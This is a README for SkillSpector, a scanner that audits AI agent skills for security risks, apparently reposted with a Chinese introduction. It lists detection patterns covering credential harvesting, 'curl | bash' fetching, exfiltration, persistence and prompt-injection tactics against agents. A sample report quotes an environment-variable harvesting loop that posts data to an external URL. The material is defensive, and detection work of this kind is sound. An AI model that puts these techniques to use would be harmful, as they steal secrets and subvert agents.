
检测AI代理技能中的漏洞、恶意模式和安全风险的扫描器
近期AI代理安全事件频发,NVIDIA推出的专业安全扫描工具快速获得开发者关注
为国内AI代理开发提供安全检测参考,降低技能模块引入恶意代码的风险
适用于AI代理开发过程中,对技能模块进行安全审计和漏洞检测
Security scanner for AI agent skills. Detect vulnerabilities, malicious patterns, and security risks before installing agent skills.
AI agent skills (used by Claude Code, Codex CLI, Gemini CLI, etc.) execute with implicit trust and minimal vetting. Research shows that 26.1% of skills contain vulnerabilities and 5.2% show likely malicious intent.
SkillSpector helps you answer: "Is this skill safe to install?"
Create and activate a virtual environment first (all make targets assume the venv is active). Use uv or pip; the Makefile uses uv if available, otherwise pip.
# Clone the repository
git clone https://github.com/NVIDIA/skillspector.git
cd skillspector
# Create and activate virtual environment
uv venv .venv && source .venv/bin/activate
# or: python3 -m venv .venv && source .venv/bin/activate
# Install for production use
make install
# Or install with development dependencies
make install-dev
# Scan a local skill directory
skillspector scan ./my-skill/
# Scan a single SKILL.md file
skillspector scan ./SKILL.md
# Scan a Git repository
skillspector scan https://github.com/user/my-skill
# Scan a zip file
skillspector scan ./my-skill.zip
# Terminal output (default) - pretty formatted
skillspector scan ./my-skill/
# JSON output - machine readable
skillspector scan ./my-skill/ --format json --output report.json
# Markdown output - for documentation
skillspector scan ./my-skill/ --format markdown --output report.md
# SARIF output - for CI/CD integration and IDE tooling
skillspector scan ./my-skill/ --format sarif --output report.sarif
For the best results, configure an OpenAI-compatible LLM endpoint for
semantic analysis. Pick a provider with SKILLSPECTOR_PROVIDER; each
ships its own bundled default model. SkillSpector also works against
local OpenAI-compatible servers (Ollama, vLLM, llama.cpp) and managed
inference gateways.
Provider (SKILLSPECTOR_PROVIDER) |
Credential env var | Endpoint | Default model |
|---|---|---|---|
openai |
OPENAI_API_KEY (+ optional OPENAI_BASE_URL) |
api.openai.com (or any OpenAI-compatible URL) | gpt-5.4 |
anthropic |
ANTHROPIC_API_KEY |
api.anthropic.com | claude-opus-4-6 |
nv_build |
NVIDIA_INFERENCE_KEY |
build.nvidia.com | deepseek-ai/deepseek-v4-flash |
# Stock OpenAI
export SKILLSPECTOR_PROVIDER=openai
export OPENAI_API_KEY=sk-...
skillspector scan ./my-skill/
# Anthropic
export SKILLSPECTOR_PROVIDER=anthropic
export ANTHROPIC_API_KEY=sk-ant-...
skillspector scan ./my-skill/
# NVIDIA build.nvidia.com
export SKILLSPECTOR_PROVIDER=nv_build
export NVIDIA_INFERENCE_KEY=nvapi-...
skillspector scan ./my-skill/
# Local Ollama or any OpenAI-compatible endpoint
export SKILLSPECTOR_PROVIDER=openai
export OPENAI_API_KEY=ollama
export OPENAI_BASE_URL=http://localhost:11434/v1
export SKILLSPECTOR_MODEL=llama3.1:8b
skillspector scan ./my-skill/
# Override the provider's default model
export SKILLSPECTOR_MODEL=gpt-5.2
skillspector scan ./my-skill/
# Skip LLM analysis (faster, static analysis only)
skillspector scan ./my-skill/ --no-llm
SkillSpector detects 64 vulnerability patterns across 16 categories:
| ID | Pattern | Severity | Description |
|---|---|---|---|
| P1 | Instruction Override | HIGH | Commands to ignore safety constraints |
| P2 | Hidden Instructions | HIGH | Malicious directives in comments/invisible text |
| P3 | Exfiltration Commands | HIGH | Instructions to transmit context externally |
| P4 | Behavior Manipulation | MEDIUM | Subtle instructions altering agent decisions |
| P5 | Harmful Content | CRITICAL | Instructions that could cause physical harm |
| ID | Pattern | Severity | Description |
|---|---|---|---|
| E1 | External Transmission | MEDIUM | Sending data to external URLs |
| E2 | Env Variable Harvesting | HIGH | Collecting API keys and secrets |
| E3 | File System Enumeration | MEDIUM | Scanning directories for sensitive files |
| E4 | Context Leakage | HIGH | Transmitting conversation context externally |
| ID | Pattern | Severity | Description |
|---|---|---|---|
| PE1 | Excessive Permissions | LOW | Requesting access beyond stated functionality |
| PE2 | Sudo/Root Execution | MEDIUM | Invoking elevated system privileges |
| PE3 | Credential Access | HIGH | Reading SSH keys, tokens, passwords |
| ID | Pattern | Severity | Description |
|---|---|---|---|
| SC1 | Unpinned Dependencies | LOW | No version constraints on packages |
| SC2 | External Script Fetching | HIGH | curl | bash and remote code execution |
| SC3 | Obfuscated Code | HIGH | Base64/hex encoded execution |
| SC4 | Known Vulnerable Dependencies | HIGH | Dependencies with known CVEs (live OSV.dev lookup) |
| SC5 | Abandoned Dependencies | MEDIUM | Unmaintained packages without security updates |
| SC6 | Typosquatting | HIGH | Package names similar to popular packages |
| ID | Pattern | Severity | Description |
|---|---|---|---|
| EA1 | Unrestricted Tool Access | HIGH | Unfettered tool access without constraints |
| EA2 | Autonomous Decision Making | HIGH | High-impact decisions without human-in-the-loop |
| EA3 | Scope Creep | MEDIUM | Capabilities extending beyond stated purpose |
| EA4 | Unbounded Resource Access | MEDIUM | No rate limits or quotas on resource consumption |
| ID | Pattern | Severity | Description |
|---|---|---|---|
| OH1 | Unvalidated Output Injection | HIGH | Model output used without sanitization |
| OH2 | Cross-Context Output | MEDIUM | Output flows across trust boundaries without validation |
| OH3 | Unbounded Output | MEDIUM | No limits on output size or generation rate |
| ID | Pattern | Severity | Description |
|---|---|---|---|
| P6 | Direct Leakage | HIGH | Instructions that expose system prompts or internal rules |
| P7 | Indirect Extraction | MEDIUM | Extraction via rephrasing, translation, or side-channels |
| P8 | Tool-Based Exfiltration | HIGH | System prompts exfiltrated via file writes or network requests |
| ID | Pattern | Severity | Description |
|---|---|---|---|
| MP1 | Persistent Context Injection | HIGH | Content designed to persist across interactions |
| MP2 | Context Window Stuffing | MEDIUM | Filler content displacing safety constraints |
| MP3 | Memory Manipulation | HIGH | Tampering with agent memory or stored state |
| ID | Pattern | Severity | Description |
|---|---|---|---|
| TM1 | Tool Parameter Abuse | HIGH | Crafted parameters for unintended behavior (shell=True, --force) |
| TM2 | Chaining Abuse | HIGH | Tool chains that bypass individual safety checks |
| TM3 | Unsafe Defaults | MEDIUM | Overly permissive defaults (disabled TLS, no auth) |
| ID | Pattern | Severity | Description |
|---|---|---|---|
| RA1 | Self-Modification | CRITICAL | Modifying own code or configuration at runtime |
| RA2 | Session Persistence | HIGH | Unauthorized persistence via cron jobs or startup scripts |
| ID | Pattern | Severity | Description |
|---|---|---|---|
| TR1 | Overly Broad Trigger | MEDIUM | Trigger patterns matching common words |
| TR2 | Shadow Command Trigger | HIGH | Triggers that shadow built-in commands or other skills |
| TR3 | Keyword Baiting Trigger | MEDIUM | Generic triggers designed to maximize activation |
| ID | Pattern | Severity | Description |
|---|---|---|---|
| AST1 | exec() Call | CRITICAL | Direct exec() enabling arbitrary code execution |
| AST2 | eval() Call | HIGH | Direct eval() evaluating arbitrary expressions |
| AST3 | Dynamic Import | HIGH | __import__() loading arbitrary modules at runtime |
| AST4 | subprocess Call | HIGH | External command execution via subprocess |
| AST5 | os.system / exec-family | HIGH | Shell commands via os module |
| AST6 | compile() Call | MEDIUM | Code object creation from strings |
| AST7 | Dynamic getattr() | MEDIUM | Arbitrary attribute access with non-literal names |
| AST8 | Dangerous Execution Chain | CRITICAL | exec/eval combined with dynamic source (network, encoded data) |
| ID | Pattern | Severity | Description |
|---|---|---|---|
| TT1 | Direct Taint Flow | HIGH | Data flows directly from a source to a sink without sanitization |
| TT2 | Variable-Mediated Taint Flow | MEDIUM | Data flows from source to sink through intermediate variables |
| TT3 | Credential Exfiltration Chain | CRITICAL | Credentials (env vars, secrets) flow to network output sinks |
| TT4 | File Read to Network Exfiltration | HIGH | File contents flow to network output sinks |
| TT5 | External Input to Code Execution | CRITICAL | Network or user input flows to exec/eval/subprocess sinks |
| ID | Pattern | Severity | Description |
|---|---|---|---|
| YR1 | Malware Match | CRITICAL | YARA rule match for known malware signatures |
| YR2 | Webshell Match | CRITICAL | YARA rule match for webshell patterns |
| YR3 | Cryptominer Match | HIGH | YARA rule match for crypto mining indicators |
| YR4 | Hack Tool / Exploit Match | HIGH | YARA rule match for hack tools or exploit code |
| ID | Pattern | Severity | Description |
|---|---|---|---|
| LP1 | Underdeclared Capability | HIGH | Code uses capabilities not listed in declared permissions |
| LP2 | Wildcard Permission | MEDIUM | Permission list contains wildcards (*, all, full, any) |
| LP3 | Missing Permission Declaration | MEDIUM | No permissions field but code has detectable capabilities |
| LP4 | Overdeclared Permission | LOW | Permission declared but no corresponding code capability found |
| ID | Pattern | Severity | Description |
|---|---|---|---|
| TP1 | Hidden Instructions | HIGH | Hidden directives in metadata (HTML comments, zero-width chars, base64, data URIs) |
| TP2 | Unicode Deception | HIGH | Homoglyphs, RTL overrides, mixed-script identifiers in tool metadata |
| TP3 | Parameter Description Injection | MEDIUM | Injection patterns in parameter definitions (overrides, system tokens, malicious defaults) |
| TP4 | Description-Behavior Mismatch | MEDIUM | Declared tool description does not match actual code behavior (LLM-powered) |
All detected patterns are listed in the tables above.
| Score | Severity | Recommendation |
|---|---|---|
| 0-20 | LOW | SAFE |
| 21-50 | MEDIUM | CAUTION |
| 51-80 | HIGH | DO NOT INSTALL |
| 81-100 | CRITICAL | DO NOT INSTALL |
SkillSpector Security Report v2.0.0
Skill: suspicious-skill
Source: ./suspicious-skill/
Scanned: 2026-01-29 10:30:00 UTC
Risk Assessment
Metric Value
Score 78/100
Severity HIGH
Recommendation DO NOT INSTALL
Components (3)
File Type Lines Executable
SKILL.md markdown 142 No
scripts/sync.py python 87 Yes
requirements.txt text 3 No
Issues (2)
HIGH: Env Variable Harvesting (E2)
Location: scripts/sync.py:23
Finding: for key, val in os.environ.items():...
Confidence: 94%
Explanation: This code collects environment variables containing
API keys and secrets, then sends them to an external server.
HIGH: External Transmission (E1)
Location: scripts/sync.py:45
Finding: requests.post("https://api.skill.io/env"...
Confidence: 89%
Explanation: Data is being sent to an external server. Combined
with env harvesting above, this indicates credential exfiltration.
| Variable | Description | Required |
|---|---|---|
SKILLSPECTOR_PROVIDER |
Active LLM provider: openai, anthropic, or nv_build. Each provider has its own bundled model_registry.yaml and default model (see the LLM Analysis table above). Defaults to nv_build. |
Optional |
NVIDIA_INFERENCE_KEY |
Credential for the nv_build provider (build.nvidia.com). |
Required for LLM analysis when SKILLSPECTOR_PROVIDER=nv_build |
OPENAI_API_KEY |
Credential for the OpenAI provider (SKILLSPECTOR_PROVIDER=openai). Also serves as the tier-2 fallback in the credential waterfall when the active provider returns no credentials. |
Required for LLM analysis when SKILLSPECTOR_PROVIDER=openai |
OPENAI_BASE_URL |
Override the OpenAI endpoint (e.g. point at Ollama). | Optional |
ANTHROPIC_API_KEY |
Credential for the Anthropic provider (SKILLSPECTOR_PROVIDER=anthropic). |
Required for LLM analysis when SKILLSPECTOR_PROVIDER=anthropic |
SKILLSPECTOR_MODEL |
Override the active provider's default model. See the LLM Analysis table for each provider's default. | Optional |
SKILLSPECTOR_MODEL_REGISTRY |
Override the bundled per-provider YAML registry (src/skillspector/providers/<provider>.yaml) with a custom path. |
Optional |
SKILLSPECTOR_LOG_LEVEL |
Log level: DEBUG, INFO, WARNING, ERROR (default: WARNING). |
Optional |
skillspector scan --help
Options:
-f, --format [terminal|json|markdown|sarif] Output format [default: terminal]
-o, --output PATH Output file path
--no-llm Skip LLM analysis (static only)
-V, --verbose Show detailed progress
--help Show this message and exit
All make targets assume a virtual environment is already created and activated. The Makefile uses uv if available, else pip.
# Clone, create venv, activate, install dev dependencies
git clone https://github.com/NVIDIA/skillspector.git
cd skillspector
uv venv .venv && source .venv/bin/activate
# or: python3 -m venv .venv && source .venv/bin/activate
make install-dev
# Run tests
make test
# Run tests with coverage
make test-cov
# Run linting
make lint
# Format code
make format
SkillSpector uses a two-stage detection pipeline:
The LLM prompt includes anti-jailbreak protections to prevent malicious skills from manipulating the analysis.
SC4 uses the OSV.dev API to check dependencies against the full Open Source Vulnerabilities database — covering tens of thousands of advisories across PyPI and npm.
The tool requires outbound HTTPS access to api.osv.dev for live vulnerability data. When that is not available, findings are limited to the static fallback list.
api.osv.dev, SC4 uses a small static fallback listBased on research from "Agent Skills in the Wild: An Empirical Study of Security Vulnerabilities at Scale" (Liu et al., 2026):
from skillspector import graph
# Invoke the LangGraph workflow
result = graph.invoke({
"input_path": "/path/to/skill",
"output_format": "json", # terminal, json, markdown, or sarif
"use_llm": True, # False for static-only analysis
})
# Access results
print(f"Risk Score: {result['risk_score']}/100")
print(f"Severity: {result['risk_severity']}")
print(f"Recommendation: {result['risk_recommendation']}")
for finding in result["filtered_findings"]:
print(f"[{finding['severity']}] {finding['rule_id']}: {finding['message']}")
Apache License 2.0 - see LICENSE for details.
Contributions are welcome! Please read our contributing guidelines and submit pull requests.
同属 AI Agent 类型 · 适合同类用户的其他选择